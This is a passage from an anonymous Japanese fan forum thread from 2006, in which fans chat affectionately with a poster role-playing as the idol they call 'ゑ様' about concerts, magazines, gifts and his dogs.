明日のご飯はカレーにするねノシ

212 :ユーは名無しネ:2006/11/28(火) 17:01:02
ゑ様ゑ様に会いたいよ(´・ω・`)

213 :ユーは名無しネ:2006/11/28(火) 21:13:09
ゑ様
このスレ感染してるね?(´・ω・`)

214 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 22:18:31
(`へ′)>210
    センタクタノンデイインデスカ!ジャアナニカオレイカンガエテオキマス!
    つ【エプロン】


(`へ′)>211
    OAマデモウスコシデス!ボクダケジャナクミンナモカッコイイノデミテクダサイ!


(`へ′)>212
    アイニキマシタ!カナシイカオシテナニカアッタンデスカ?ボクニハナシテクダサイ!


(`へ′)>213
    ナニニカンセンシテルンデスカ!ボクヨクワカリマセン!

215 :ユーは名無しネ:2006/11/29(水) 22:25:42
ゑ様ゑ様こんばんはノシ
また逢いましたね(*´∀`)
この間はカレーdでした
カレーのお礼にこれドゾーつ【チロルチョコパン黒ゴマタルト】


216 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 22:26:23
(`へ′)y─┛

プハー(`◇′)y─┛~~~

217 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 22:31:44
(`へ′)>215
    オネイサンコノマエハドーモ!ダレモイナイトオモッテキュウケイシテマシタ!スイマセン!
    つ【チロルチョコパン黒ゴマタルト】アリガゑゑ!
    コレハチョコデスカ!パンデスカ!ソレトモタルトデスカ!

218 :ユーは名無しネ:2006/11/29(水) 22:40:43
休憩中のゑ様もキャワなので許してあげますね(*´∀`)つ【ポケット灰皿】
チロルチョコパン黒ゴマタルトはチロルチョコ黒ゴマタルトのパッケージの袋の中に
黒ゴマタルト風味のパンが入ってるヤシなので簡単に言うとパンですね
ファミマ限定発売で、ウマーだたので是非ゑ様も食べてみてください

219 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 22:49:31
(`へ′)>218
    ナルホド!オイシソウナノデコンドオコヅカイデカッテタベテミヨウカナ!
    イマキュウケイシナガライロイロカンガエゴトシテマシタ!


ケムリガニガテナオネイサンイマセンカ!ダイジョウブカナ!(`へ′)y─┛゙ 【ポケット灰皿】

220 :ユーは名無しネ:2006/11/29(水) 22:51:05
ゑ様はじめまして緊張します!
自分深山ですがお話できますか?
ごあいさつですー(*´д`・)∠☆【お花】

221 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 22:59:40
(`へ′)>220
    ハジメマシテ!オハナアリガトウゴザイマス!シッカリメニヤキツケトキマス!
    オレイノスマイルデス!(*`▽′*)ニコ!

222 :ユーは名無しネ:2006/11/29(水) 22:59:53
たまにはユクーリ休憩するのも必要だよね(*´∀`)
他にもチロルチョコパンシリーズはあと3種類あるみたいだから姐さん方も良かったら食べてみてねノシ

ゑ様ゑ様明日またしても自分検定だよorz
自分の将来のためなのでガンガってきますね(`・ω・´)b

223 :ユーは名無しネ:2006/11/29(水) 23:14:13
ゑさまコンバンワ
ゑ様のエプロンお預かりしますね(*´∀`) つ【エプロン】
オシャレ着用洗剤で丁寧に洗ってきますノシ
その前に嗅いだりとかしないから安心してくださいね

224 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 23:17:31
(`へ′)>222
    オントオフノキリカエッテダイジデスヨネ!
    ショウライノタメニガンガッテルオネイサンヲオウエンシマス!マケナイデクダサイ!


(`へ′)<アシタケンテイガウマクイクヨウニオウエンカウタイマス!


      ガンバッテルキミノメガ〜
      セカイジュウニカガヤイテ〜!

      ウイルビーオーライ〜カエテユク〜 ユーシャインオンザワールド〜!


(`へ′)>223
    ギョ!(;`◇′)
    オネイサンヤメテクダサイ!ケッシテカイダリシナイデクダサイ!

225 :ユーは名無しネ:2006/11/29(水) 23:25:22
ゑ様ゑ様ステチなお歌d!
これで明日も乗り切れそうだよ(*´∀`)
明日に備えて自分は先に寝てお布団温めておきますねノシ

ゑ様も姐さん方もオヤスミパイナップル!

226 :ユーは名無しネ:2006/11/29(水) 23:29:48
ゑ様
今日
何してました?

227 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 23:33:54
(`へ′)>225
    ソレハフトンニハイレッテコトデショウカ!オネイサンミカケニヨラズケッコウダイタンデスネ!(*`へ′*)
    オヤスミパイナップル!


(`へ′)>226
    ダンスノレンシュウヲシテマシタ!アトタンバリンノレンシュウモシマシタ!
    タンバリンハダイブウマクナッタトオモイマス!オネイサンハナニシテタンデスカ!!

228 :ユーは名無しネ:2006/11/29(水) 23:38:26
ゑ様ノシ
>226だけど今日も仕事だったよ
ゑ様のことを考えて一日乗り切ったよ

229 :ユーは名無しネ:2006/11/29(水) 23:41:26
ゑ様
エプロンお洗濯終わりましたつ【エプロン】
フローラルでしたよ(*´∀`)

230 :(*`へ′) ◆JUowmt7f2Y :2006/11/29(水) 23:46:40
(`へ′)>228
    オネイサンオツカレーデス!
    マッサージシマショウカトイイタイトコロデスガセクハラニナリソウナノデヤメテオキマス!(*`▽′*)


(`へ′)>229
    ヤッパリカイダンデスネ!(⊃へ⊂)
    つ【エプロン】デモアリガゑゑ!ハヤイデス!
    モシカシテオネイサンノイエハクリーニングヤサンデスカ?キレイニタタンデアルシ!

231 :ユーは名無しネ:2006/11/29(水) 23:54:53
229だけどゑ様ゴメンネゑ様を辱めたかったんだ
うちはクリーニング屋じゃないけどお洗濯得意だよ
ゑ様のおウチで専属家政婦として雇ってください

232 :ユーは名無しネ:2006/11/30(木) 00:03:47
最近腰痛がひどかったので
マッサージお願いしたいな
ゑ様に触られたらそれだけで治っちゃうかも(*´∀`)

233 :(*`へ′) ◆JUowmt7f2Y :2006/11/30(木) 00:12:03
(`へ′)>231
    オネイサンヤメテクダサイ!ボクミナサンニ℃Mダトオモワレタラドウスルンデスカ!イタッテノーマルデス!
    カセイフモコウホシャガオオクテキメラレマセン!


(`へ′)>232
    オンナノヒトノカラダニサワルナンテデキマセン!ジブン、コウハッスカラ!
    デモハンドパワーデナオセルカモシレマセン!
    (σ`へ′)σ→→→ゑサマビーム!


(`へ′)<クダラナイトカイワナイデクダサイ!コレデモケッコウキイタリスルンデス!ゴクマレニ!!

234 :ユーは名無しネ:2006/11/30(木) 00:46:12
>220です
ゑ様まだ起きてますか?
スペシャルスマイル頂いて光栄です!dです!
今日はTVで踊るゑ様見たかったです(*´д`・)
タンバリン練習乙でした!
明日のお仕事はゑ様のスマイルで乗り切りますねっ!
オヤスミパイナップルデス!!

235 :(*`へ′) ◆JUowmt7f2Y :2006/11/30(木) 01:08:09
(`へ′)>234
    ボクモデタカッタデスガザンネンデス!
    アシタモ1ニチガンガゑワラゑゑ!!オヤスミパイナップル!

236 :ユーは名無しネ:2006/12/01(金) 01:14:44
ゑ様ゑ様
あとちょっとで逢えそうだったのにもうおやすみパイナップルだったょ
ゑ様とはニアミスばっかり
まるで韓国ドラマだよ
また来るね
おやすみパイナップル
いい夢見てね

237 :ユーは名無しネ:2006/12/02(土) 10:27:21
ゑ様ゑ様
夢にゑ様がでてきました
でも冷たくされちゃった悲しい(つД`)

238 :ユーは名無しネ:2006/12/03(日) 01:36:15
ゑさまゑさま
先に謝るけど変なこと聞いてごめんなパイナップル
異性と角を立てずに縁を切る方法を教えて下さい

239 :ユーは名無しネ:2006/12/03(日) 19:02:57
ゑ様ハァ━━━━━━ *´Д`* ━━━━━━ン!!!!
ゑ様ゑ様
黒髪のゑ様もモエス(*´∀`)

240 :ユーは名無しネ:2006/12/03(日) 23:46:07
ゑ様ゑ様
ゑ様の歌声がステチすぎて目汁が止まらないよ
ゑ様のせいだよどうしてくれるの。゚(゚´Д`゚)゚。

241 :ユーは名無しネ:2006/12/06(水) 17:19:14
ゑ様!!!!!
3誌のゑ様がカワユスでもう自分どうしたらいいかわかりません
自分も>240姐さん同様目汁が止まりません(つД`)

242 :(*`へ′) ◆JUowmt7f2Y :2006/12/07(木) 22:45:59
(`へ′)<ビジョクンオールアップオメデトウゴザイマス!
      シンキョクハボクノスパルタシドウデミッチリオシエルノデカクゴシテクダサイ!


(`へ′)>236
    カンコクドラマナンテボクニハロマンティックスギマセンカ!
    オネイサン!ココデハ【ょ】ハ【よ】デオナガイシマス!


(`へ′)>237
    アクマデモユメノナカノハナシナノデ!ボクハジョセイニヤサシクジブンニキビシクガモットーデス!


(`へ′)>238
    イセイッテコイビトデスカ?チョクセツアッテオワカレヲイウノガイチバンゴタゴタシマセン!


(`へ′)>239
    クロカミノボク「モ」ッテコトハソレイガイモッテコトデスヨネ!アリガトウゴザイマス!
    コレデマタアンシンシテイロヲカエラレマス!


(`へ′)>240
    ナカナイデクダサイ!ジョセイノナミダヲミルトドウシテイイカワカリマセン!


(`へ′)>241
    ホンノウノママニボクヲミテクダサイ!コンゲツモカッコヨクトッテモラエテダイマンゾクデス!

243 :ユーは名無しネ:2006/12/07(木) 22:47:35
お久しぶりですゑ様ノシ
お元気でしたか?

244 :ユーは名無しネ:2006/12/07(木) 22:50:30
ゑ様ゑ様こんばんはノシ
遅くなったけど自分も少蔵見たよ
ゑ様出番多くてテラカッコヨス(*´∀`)
終始楽しそうなゑ様を見てこっちまで楽しくなっちゃった

245 :(*`へ′) ◆JUowmt7f2Y :2006/12/07(木) 22:57:13
(`へ′)>243
    コンバンワラゑゲンキデスゲンキデス!
    スコシサムイケドワンコヲダイテルトアッタカイデスヨ!


(`へ′)>244
    アリガトウゴザイマス!トークモイッパイツカワレテボクテキニマンゾクデス!
    ツギハヒトリPヤッテミタイデス!

246 :ユーは名無しネ:2006/12/07(木) 23:12:35
ワンコ抱いてるゑ様想像しただけでモエス(*´Д`*)
自分もゑ様の家のワンコ抱いてヌクヌクしたいな(*´∀`)
実は前にプロデューサーゑ様を期待してゑ様の名前とテーマを書いてハガキ出したのに来週そのテーマを鑢がやることになってたよorz

247 :(*`へ′) ◆JUowmt7f2Y :2006/12/07(木) 23:21:27
(`へ′)>246
    ハガキダシテクレタオネイサンガイタダケデコウエイデス!
    ゲンキダシテクダサイ!ボクノタイセツナワンコヲショウカイシマスカラ!


(`へ′)<ホラ!ミナサンニアイサツハ?


∪`へ′∪ …ワン!
 O,UU,O

248 :ユーは名無しネ:2006/12/07(木) 23:44:41
ゑ様の大切なワンコ初披露ですね(*´∀`)
飼い主に似て照れ屋そうでキャワなワンコハァー(*´Д`*)ーン
ゑ様のワンコで元気出たよ
またゑ様プロデューサー化目指してハガキ書くよノシ

249 :(*`へ′) ◆JUowmt7f2Y :2006/12/08(金) 00:04:28
(`へ′)>248
    ワンコホメラレルノウレシイデス!(*`へ′*)
    オネイサンノソノオモイガアルカギリPデキソウナキガシマス!ナニウタオウカナ!

250 :ユーは名無しネ:2006/12/08(金) 00:15:21
ワンコ5匹も飼ってるしゑ様ワンコ大スチだよね
ゑ様にだいされてるワンコたちが羨ましいよ
3誌も見たけどゑ様にサプライズクリスマスしてホスィな(*´∀`)
ゑ様サンタwktk

251 :(*`へ′) ◆JUowmt7f2Y :2006/12/08(金) 00:21:24
(`へ′)>250
    ジャアボクノバイクノウシロニマタガッテヨルノウミヘイキマスカ!

252 :ユーは名無しネ:2006/12/08(金) 00:31:59
是非おながいしますゑ様ノシ
でも自分バイクには一度も乗せてもらったことがないので
その時はゑ様の腰にギュっと手を回してつかまっててもイイですか?

253 :(*`へ′) ◆JUowmt7f2Y :2006/12/08(金) 00:47:48
(`へ′)>252
    イイデスヨ!オチナイヨウニシッカリツカマッテテクダサイ!
    イマボクスッゴクハズカシイコトイッテマスカ?テレテナイデス!(n*`へ′*)n

254 :ユーは名無しネ:2006/12/08(金) 00:53:57
ゑ様 ゑ様
もしかして今いらっしゃいますか?
せっかくの初遭遇かもしれないので言わせて下さい
ゑ様大スチ はぁと

255 :(*`へ′) ◆JUowmt7f2Y :2006/12/08(金) 01:01:29
(`へ′)>254
    ハジメマシテ!ゑサマー∠(*`▽′*)ゝデス!ハァトマデツケテクレテアリガゑゑ!
    オネイサンココデハクウハクハイラナイノデツギハヨロシクオネガイシマス!

256 :(*`へ′) ◆JUowmt7f2Y :2006/12/08(金) 01:29:14
(`へ′)<アシタモオネイサンタチガエガオデスゴセルマスヨウニ!(*`▽′*)ニッ!
      オヤスミパイナップゑ!

257 :ユーは名無しネ:2006/12/08(金) 09:55:41
ゑ様もはようございます
もしやその顔はワンコまでツンデレって事ですか
キャワ杉ます_ト、 ̄|〇
今度ワンコのツンデレさも見てみたいのでリクエストしておきますね

ゑ様が1日笑顔で過ごせますように(*´∀`)ニッ

258 :ユーは名無しネ:2006/12/08(金) 18:14:19
ゑ様お久しぶりです
ゑ様ワンコがキャワすぎてリヤルに咳き込んで呼吸困難です
ゑ様は罪なワンコですね

259 :ユーは名無しネ:2006/12/09(土) 01:13:40
ゑ様に最近落ちたが本スレワカラナス
ゑ様ヒントおながい

260 :ユーは名無しネ:2006/12/09(土) 01:44:50
ゑ様ゑ様
やっぱり年末年始をゑ様とすごすのは一筋縄ではいかなそうですorz
電話とお友達になって頑張りますからゑ様とワンコも応援してくださいね(`・ω・´)

261 :ユーは名無しネ:2006/12/09(土) 01:48:29
>259
ゑ様でなくてスマソだが本スレ全く動いてないしわからないかもね
最近落ちたとか言ってるけどホントに好きなら自力で見つけるくらいしなよ
このスレでも本スレの話題出たし探せばきっとわかるよ

262 :ユーは名無しネ:2006/12/09(土) 04:59:19
ゑ様ゑ様
自分も>260姐さんと一緒でガンガッタけどだめですた
ゑ様との年越しの為に今日も気合い入れてかけますね(`・ω・´)b

263 :ユーは名無しネ:2006/12/09(土) 06:34:01
>261
わかりやすいように向こうageといたよ
ゑ本スレ
ジャニーズ2板
●正直、横尾渉の成長に感動中なわけだが●
本スレでスレタイ会議するからみんな集まれー

リンク貼らないなんて自分てどこまでも親切

264 :ユーは名無しネ:2006/12/09(土) 06:45:59
馬路じゃん^^;

265 :ユーは名無しネ:2006/12/09(土) 11:40:34
ゑ様ゑ様もはノシ
姐さん方今日も電話ガンガってね
自分は逝けないけど姐さん方がゑ様に会えるように応援してるよp(`・ω・´)q
ところで今回もゑ様団扇発売するんだね
逝けない分今から友にゑ様グッズ全買いしてもらうようお願いするねノシ
葡萄缶グッズwktk(*´∀`)

266 :ユーは名無しネ:2006/12/09(土) 11:48:46
ゑ様姐さん方もはようございます
ゑ様団扇wktkですわね(*´∀`)
前回のビズが良かっただけに今回もと期待!
1枚じゃ物足りない自分は複数買ってしまいそうです_| ̄|○

267 :ユーは名無しネ:2006/12/09(土) 21:59:18
ゑ様ゑ様
煽られるわけではないけど
本スレはどうしたらいいでしゅか?

268 :ユーは名無しネ:2006/12/10(日) 02:05:36
かわいそうなズニア発見

269 :ユーは名無しネ:2006/12/11(月) 01:36:37
ゑ様ゑ様
自分260ですが電話繋がりましたまさに三度目の正直です(*´∀`)
他の姐さんたちも無事取れているといいですな

270 :(*`へ′) ◆JUowmt7f2Y :2006/12/11(月) 09:47:35
(`へ′)<オハヨウゴザイマス!オキテクダサイ!


(`へ′)>257
    ワンコマデッテコトハボクモツンデレッテコトデスカ!シンジラレナイ!
    オネイサンナニカデテマス!イマスグカクシテクダサイ!ハズカシイ!


(`へ′)>258
    ソレハタイヘンデス!チャントコキュウヲシテクダサイ!スー(`◇′)ハー(*`Д′*)
    オネイサンボクガワンコデハナクボクガカッテルペットノワンコデス!


(`へ′)>259
    ココデボクガオシエタライミナイトオモイマス!


(`へ′)>260>269
    ボクトワンコノオモイガツウジマシタ!オオミソカイッショニステチナジカンヲスゴシマショウ!


(`へ′)>261
    ソウデスソウデス!アンナニミツケヤスイスレハアリマセン!カソッテマスガ!


(`へ′)>262
    オネイサンツナガリマシタカ?チャンスハマダアリマス!ボクトワンコデオウエンシマス!


(`へ′)>263
    ヲバサンサイテーデス!シンジラレナイ!


(`へ′)>265
    オネイサンイケナクテモテレビデイッショニCDシマショウ!ソシテライネンモボクヲヨロシクオナガイシマス!


(`へ′)>266
    フクスウガイアリガゑゑ!デモオサイフトソウダンシテカッテクダサイネ!


(`へ′)>267
    ゼヒイドウシテクダシャイ!キョウニデモヨロシクオナガイシマシュ!カンデマセェン!


(`へ′)<ボクハコレカラシゴトヘイッテキマス!コウロクガンガッテキマス!ノシ

271 :ユーは名無しネ:2006/12/11(月) 11:29:09
ゑ様おはよう
小蔵見に行くよ
ふぁいとおおおおおおおお

272 :ユーは名無しネ:2006/12/11(月) 11:47:22
ゑ樣おはようございます!!11344!!
ゑ樣とはいつも夜の密会なので朝からお会い出来るとは思っていませんでした
今日は朝からhappyです!!
お仕事がんがって下さい!!!!

273 :ユーは名無しネ:2006/12/11(月) 13:07:39
ゑ様こんにちは
ゑ様のお仕事お見送りできるのウレシス
頑張ってね!いってらっしゃい(*´∀`)ノシノシ

274 :ユーは名無しネ:2006/12/11(月) 21:45:00
ゑ様こんばんはノシ
牛紺行けることになりました
ゑ様と年越しできそうで幸せです

275 :ユーは名無しネ:2006/12/11(月) 22:05:25
ゑ様ゑ様
公録は最後の最後で肩出したりコケたりしててんこもりでしたね
茶髪のすきまから見える首筋にハァハァですゑ様(*´∀`)

276 :(*`へ′) ◆JUowmt7f2Y :2006/12/12(火) 22:28:40
(`へ′)>271
    コンバンハ!キノウハキテクレテアリガトウゴザイマス!ボクドウデシタカ?


(`へ′)>272
    オネイサンミッカイッテナンカアヤシイデス!(*`へ′*)テレ!


(`へ′)>273
    イッテラッシャイッテイワレルノチョットウレシイデス!


(`へ′)>274
    タクサンノセンパイトズニアガデマスガボクノコトミツケテクダサイ!
    イッショニステチナトシアケヲムカエマショウ!


(`へ′)>275
    カタダシマシタ!タマニハセクシーナボクヲアピールシテモイイデスヨネ!

277 :(*`へ′) ◆JUowmt7f2Y :2006/12/12(火) 23:08:54
(`へ′)<キョウハダレモキテクレナインデスカ!サミシイデス!

278 :ユーは名無しネ:2006/12/12(火) 23:56:01
ゑ様ゑ様
自分がいるよ(*´∀`)
外で風がびゅうびゅう吹いてて怖いよ

279 :ユーは名無しネ:2006/12/13(水) 00:31:10
こんばんはゑ様
ちょっと来るのが遅かったかなぁ
今日も寒いのでゑ様の隣で寝ることにするねオヤスミパイナップル

280 :ユーは名無しネ:2006/12/13(水) 19:04:24
ゑ様ゑ様
ガーネットみたいな赤い宝石のネックレス似合ってたよ

281 :ユーは名無しネ:2006/12/13(水) 20:21:29
ゑ様ゑ様
昨日は寂しい思いさせてごめんね(*´∀`)つ゛
もうゑ様来ないだろうなとオモて電源落とした直後にゑ様が来てたみたいだ
すれ違いテラカナシス。゚(゚´Д`゚)゚。

282 :(*`へ′) ◆JUowmt7f2Y :2006/12/13(水) 22:12:15
(`へ′)>280
    カゼハゼンゼンコワクナイデス!ボクタチハカゼノナカノショウネンデスカラ!
    キレイダヨネヒュールヒュールデス!


(`へ′)>279
    ジョセイノトナリデネルナンテカルガルシクシマセン!
    デモオネイサンガネルマデオハナシスルコトハデキマス!


(`へ′)>280
    アリガトウゴザイマス!ボクハアツイオトコナノデ!アカダイスチデス!


(`へ′)>281
    サミシイナンテオモッテマセン!ベツニ!
    …デモソンナヤサシサモヒツヨウデスヨネ!アリガゑゑ!

283 :ユーは名無しネ:2006/12/13(水) 22:16:41
ゑ様ノシ
今夜もゑ様とのあまーいひとときを過ごしに来たよ!
今夜もた〜っぷりゑ様に酔わせて下さいね(*´∀`)

284 :(*`へ′) ◆JUowmt7f2Y :2006/12/13(水) 22:25:58
(`へ′)>283
    ヨワセルダナンテボクデキマセン!ジョセイヲヨワセルクライナラクドキマス!

285 :ユーは名無しネ:2006/12/13(水) 22:58:56
ゑ様ゑ様こんばんはノシ
またしてもゑ様に気付かず電源落としてしまうとこだたよ
ゑ様寂しいんだったらちゃんと寂しいって言ってね(*´∀`)σ)`へ′)

286 :(*`へ′) ◆JUowmt7f2Y :2006/12/13(水) 23:08:52
(`へ′)>285
    コンバンハ!サミシクナンテアリマス!!ミツケテモラエテヨカッタデス!
    つ【ホットレモン】ネルマエニノンデクダサイ!


(`へ′*)>283
     ガラニモナイコトイッテシマイマシタ!オネイサンモドウゾ!
     つ【ホットレモン】  

287 :ユーは名無しネ:2006/12/13(水) 23:14:20
ゑ様d!(*´∀`)つ【ホットレモン】
寒いときはヤパーリ温かいのが良いよねゑ様もこれドゾーつ【ホットチョコレート】
素直なゑ様もキャワキャワ
ゑ様なら例え遠くにいたって見つける自信あるよノシ多分…

288 :ユーは名無しネ:2006/12/13(水) 23:14:30
ゑ様こんばんはノシ
自分誕生石ガーネットだよ(*´∀`)
ところで三誌読んだあと唐突にデビゑゑから
カビゑゑに思考が飛んだんだけどどうしたらいいですか?(w

289 :(*`へ′) ◆JUowmt7f2Y :2006/12/13(水) 23:25:40
(`へ′)>287
    オネイサンサイゴマデジシンヲモッテイッテクダサイ!(′へ`*)ガクリ
    つ【ホットチョコレート】アリガトゑゑ!アッタマリマス!
    マダネナクテヘイキデスカ?ボクノタメニヨフカシハヤメテクダサイネ!


(`へ′)>288
    ガーネットオネイサンコンバンハ!ボク3シデカビノハナシトカシマシタカ?
    つ【ホットカルピス】アツイノデキヲツケテノンデクダサイ!

290 :ユーは名無しネ:2006/12/13(水) 23:29:55
ゑ様冗談だから気にしないでつ゛
どこに居たって全力でゑ様を探して全力で見つめるからね(*´∀`)
実はもう眠くなってきたので自分は先に寝ますね
お布団温めておくのでゑ様も眠くなったらいつでもドゾーノシ

ゑ様も姐さん方もオヤスミパイナップゑゑ!

291 :ユーは名無しネ:2006/12/13(水) 23:32:32
ゑ様レスd
カビゑゑは三誌のデビルゑ様からの自分の連想だよ
さて明日も朝早いので寝ますね
ゑ様姐さん方オヤスミパイナップゑゑ(*´∀`)

292 :ユーは名無しネ:2006/12/13(水) 23:35:21
ゑ様ゑ様
前に検定でゑ様パワー注入とお歌もらったヤシです(*´∀`)ノシ
今日やっと結果返ってきたんだけど2つとも無事に受かってたよ
これもゑ様が応援してくれたおかげだよねゑ様dd!

293 :(*`へ′) ◆JUowmt7f2Y :2006/12/13(水) 23:40:46
(`へ′*)>290
     ナンカキョウハナデラレテバッカリデス!テレルノデヤメテクダサイ!
     デモヤサシイオネイサンバカリデボクウレシイデス!オヤスミパイナップゑゑゑ!


(`へ′)>291
    ナルホド!ナゾガトケマシタ!アヒゑゑモケッコウカワイイノデヨロシクー!(*`▽′*)デヘ!
    オヤスミパイナップゑゑゑ!


(`へ′)>292
    オボエテマスオボエテマス!ゴウカクオメー∠(*`▽′*)ゝデス!
    ボクノパワージャアリマセン!
    ボクトオネイサンノパワーデス!(*`へ′*) テレ!

294 :ユーは名無しネ:2006/12/14(木) 00:08:15
283だけど頂きますね(*´∀`)つ【ホットレモン】
ちょっと冷めちゃってるんでゑ様が暖めて下さい!
やさしいゑ様もスチだけどたまに見せるデビゑ様にキュンします

295 :(*`へ′) ◆JUowmt7f2Y :2006/12/14(木) 00:19:08
(`へ′)>294
    レンジデチン!ットアッタメマスネ!ヤケドニチュウイシテノンデクダサイ!
    ジョセイニヤサシクハアタリマエデスカラ!デモタマニ℃Sナデビゑガデテモユルシテクダサイ!

296 :ユーは名無しネ:2006/12/14(木) 00:33:59
フェミニストなゑ様ハァ━━━━━━*´Д`*━━━━━━ン!!
温めてくれてからアツアツだよつ【ホットレモン】
でもゑ様の温もりで暖めてって言ったのにレンジで温める℃Sなゑ様…

297 :(*`へ′) ◆JUowmt7f2Y :2006/12/14(木) 00:42:21
(`へ′)>296
    ダッテボクノタイオンジャアタタメニゲンカイガアルンデス!
    オネイサンタチニハカラダノシンマデアッタマッテホシイデスカラ!スイマセン!ボクモヒトクチノミマシタ!(`。へ′)

298 :ユーは名無しネ:2006/12/14(木) 00:56:52
ゑ様と間接キスしちゃったかも!?キャー∩(´∀`∩)(∩´∀`)∩キャー
どおりでこの【ホットレモン】すごいおいしいと思った(w

299 :(*`へ′) ◆JUowmt7f2Y :2006/12/14(木) 01:00:30
(`へ′)>298
    イエ!ストローデノンダノデカンセツチスデハアリマセン!
    スッゴクアツカッタ!(;`◇′)ヒー!

300 :(*`へ′) ◆JUowmt7f2Y :2006/12/14(木) 01:08:31
(`へ′)<300ナラブドウカンDVDハツバイデス!オヤスミパイナップゑゑ!

301 :ユーは名無しネ:2006/12/14(木) 01:33:58
ゑ様300ゲトオメ!
葡萄缶どんな仕上がりになってるのか今から楽しみだよ
でもでもゑ様に会えるだけで自分は十分嬉しいよ
オヤスミパイナップゑ!(*´∀`)DVDwktk

302 :ユーは名無しネ:2006/12/14(木) 03:30:30
ゑ様300ゲトーオメ
今日もカッコヨス(*´Д`)
ゑ様姐さん方オヤスミパイナップゑゑ!

303 :ユーは名無しネ:2006/12/14(木) 19:13:59
権力は反対の極にスパイを置く

304 :ユーは名無しネ:2006/12/16(土) 07:59:24
ゑ様ゑ様
おはようございます
ゑ様自分と一緒に新幹線でお出かけしませんか?
最後まで待ってますゑ様(*´∀`)

305 :ユーは名無しネ:2006/12/16(土) 10:29:00
ゑ様もはようございます
今日は晴れてるけどちょっと寒そうかも(*´∀`)
風邪に注意にしてお仕事ガンガッテね

306 :ユーは名無しネ:2006/12/17(日) 13:05:34
ゑ様もはようございます夕達見ました
いいーわーけーなんてーききーたくないヤイヤイヤイゑ様アップ素敵でした
葡萄缶がますます楽しみです(*´∀`)

307 :ユーは名無しネ:2006/12/17(日) 13:28:27
ゑ様ゑ様
カナーリ早めのクリスマスプレゼントd!波から大運動会のゑ様写真届いたよ(*´∀`)ノシ
ゑ様一枚目からキャワな上、リレーのゼッケン姿でゑ様の細さにorz
四枚目なんて四枚目なんてハァ━━━━━━*´Д`*━━━━━━ン!!
初めて蛇兄に感謝しちゃった気がするよ
これから届く姐さん方もwktkして待っててね(`・ω・´)b

308 :ユーは名無しネ:2006/12/17(日) 15:19:34
ゑ様ゑ様自分の所にも写真きました(*´Д`)
ゑ様がスレタイ通りタンバゑ持って青組のスパイしてる写真届いてテラウレシス
4枚共どれもステチ杉ます…本当にorz

309 :ユーは名無しネ:2006/12/17(日) 18:49:07
ゑ様ゑ様
自分>262なんだが
ゑ様とワンコに応援してもらったのにまだ確保出来てナスorz最後までガンガってはみるね
あと今日たこやきに行ったんだが残念ながらゑ様とお会い出来なかたよ(´・ω・`)
もしかしたら自分はお会い出来るのは正月明けになるのかもしれませんね
帰宅したら届いてるはずの写真wktkですノシ

310 :ユーは名無しネ:2006/12/18(月) 00:16:29
ゑ様ゑ様
自分も大運動会のゑ様写真頂いたよ〜
トンクス!
自分はリレーのタンクトップ姿が大のお気に入り
ゑ様のお陰で5ヶ月で7kgダイエット成功
4日の葡萄缶紺では大運動会のときよりは
ゑ様に近い体型になって参戦できると思う

311 :(*`へ′) ◆JUowmt7f2Y :2006/12/19(火) 21:56:33
(`へ′)>301
    ボクモミナサントヒサシブリニサワゲルノデイマカラタノシミデス!!


(`へ′)>302
    キョウモッテコトハイツモカッコイイッテコトデスカ!アリガゑゑ!(*`▽′*)デヘ!


(`へ′)>303
    ナンダカトッテモイイコトバナンダロウケドageトゼンカクデダイナシデス!


(`へ′)>304
    オソクナッタケドツレテッテクダサイ!タマニハリョコウシタイキブンデス!


(`へ′)>305
    ゴシンパイアリガゑゑ!ボクハフユデモゲンキイパーイデス!


(`へ′)>306
    ヤイヤイヤイデハミヤtクンニアップモッテイカレテチョットザンネンデス!
    デモオネイサンにヨロコンデモラエタナラボクハウレシイデス!


(`へ′)>307
    リレーノボクダイコウヒョウデスネ!
    ジャニーサンヘミナサンガヨロコンデイタトツタエマス!マタツギモキタイシテテクダサイ!


(`へ′)>308
    スレタイニスパイノコトガカイテアルノイマオモイダシマシタ!ミンナニバレタラオオサワギデス!(;`へ′)


(`へ′)>309
    タコヤキセッカクキテクレタノニスイマセン!ドームトブドウカンデハキットオネイサンニアエルトシンジテマス!


(`へ′)>310
    オネイサンダイエトセイコウオメー∠(*`▽′*)ゝデス!
    ボクノシャシンヲミテコレカラモタイケイジガンガッテクダサイ!デモムリハキンモツデスヨ!

312 :(*`へ′) ◆JUowmt7f2Y :2006/12/19(火) 22:23:36
(`へ′)<キットキミハコナイーヒトリキリノクリスマスイヴ〜!
      サイレンナイ〜ホーリーナイ〜!


(`へ′)ポツン…

313 :ユーは名無しネ:2006/12/19(火) 22:36:07
ゑ様ゑ様こんばんはノシ
長い間一人にしちゃっててスマソ(´・ω・`)
そんな寂しそうな顔しないでつ゛
今来たのでお話して温まろう(*´∀`)ノシ

314 :(*`へ′) ◆JUowmt7f2Y :2006/12/19(火) 22:38:50
(`へ′)>313
    ベツニサミシソウナカオトカシテマセン!デモミツケテクレテウレシカッタノデモウ1キョクウタイマス!



(`へ′)<ゑ〜ゑゑゑ!2リニ〜ホシガフリソ〜ソ〜グ!
      モウ〜2〜ドト〜ユメヲトメナイデ〜!


(`へ′)<ゑシエル!NOW ON SALE!

315 :ユーは名無しネ:2006/12/19(火) 22:45:22
自分には十分ゑ様が寂しそうに見えたよ
だからすぐさま飛んで来ちゃった(*´∀`)
今日はゑ様のお歌イパーイでテラウレシス
両方とも自分だけのお歌にしちゃってもイイですか?

316 :(*`へ′) ◆JUowmt7f2Y :2006/12/19(火) 22:59:53
(`へ′)>315
    イイデスヨ!ボクノタメニトンデキテクレルナンテボクアイサレテマスネ!テレマス!
    デハオネイサンボクハアシタノジュンビヲシテネマス!


    ホカノオネイサンモツギハエガオデアエルトイイデスネ!オヤスミパイナップゑ!(`へ′)ノ

317 :ユーは名無しネ:2006/12/19(火) 23:38:35
ゑ様
正月は良い席で
ゑ様を見れそうだよ

318 :ユーは名無しネ:2006/12/19(火) 23:40:05
もーゑ様来てたんなら教えてよね

319 :ユーは名無しネ:2006/12/20(水) 02:08:41
ゑ様自分もこんな良席きたのはじめてだよ
wktkしてます
ゑ様のかっこよさを近くでこの目に焼き付けますね

320 :ユーは名無しネ:2006/12/20(水) 18:45:17
ゑ様ゑ様
ここウイルス感染してるよ
アラート出るよどうしようゑ様
